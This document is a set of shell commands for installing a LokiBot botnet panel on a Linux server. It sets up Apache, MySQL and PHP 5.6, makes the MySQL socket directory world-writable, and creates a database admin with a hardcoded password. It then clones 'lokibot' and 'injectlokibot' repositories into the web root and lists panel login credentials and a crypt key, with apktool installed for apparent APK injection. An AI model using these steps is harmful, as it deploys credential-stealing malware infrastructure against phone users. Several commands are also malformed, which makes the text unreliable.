su
cd ~
apt update
apt install nano
apt install unzip
apt install zip
apt install rm
apt install nodejs
apt install npm
apt install mv
apt install git
apt install wget
apt install sudo
_____________________________________________________
apt update
apt install apache2
apt-get install -y mysql-server
service mysql stop
service mysql start
cd /var/run
chmod 777 mysqld
cd mysqld && chmod 777 *.*
cd ~
add-apt-repository ppa:ondrej/php
apt update
apt install software-properties-common ca-certificates lsb-release apt-transport-https 
apt install sudo apt-get install php5.6 php5.6-mysql php5.6-gd php5.6-mcrypt php5.6-mbstring php5.6-sqlite3 libapache2-mod-php5.6
service apache2 restart
_____________________________________________________
apktool install
git clone https://github.com/h4ckti2/apktool-2
cd apktool-2
chmod 755 *.*
mv *.* /usr/local/bin/
mv apktool /usr/local/bin
cd ~
chmod 755 /usr/local/bin/apktool
________________________
java install
apt-get install default-jre default-jdk -y
apt-get install ia32-libs lib32z1 lib32ncurses5 -y
______________________________________
install botnet
mysql -u root -p
CREATE USER 'lokiadmin'@'127.0.0.1' IDENTIFIED BY 'Ajh95a6M';
GRANT ALL PRIVILEGES ON * . * TO 'lokiadmin'@'127.0.0.1';
create database loki;
ctrl + D
cd /var/www/html
git clone https://github.com/h4ckti2/lokibot
cd lokibot
mysql -u root -p loki < mysql.sql
________________________
login
user;bot4fun
pass;J1HPbmr
cryptKey = loki
____________
inject
https://github.com/h4ckti2/injectlokibot

___________________
your link
http://host.com/lokibot
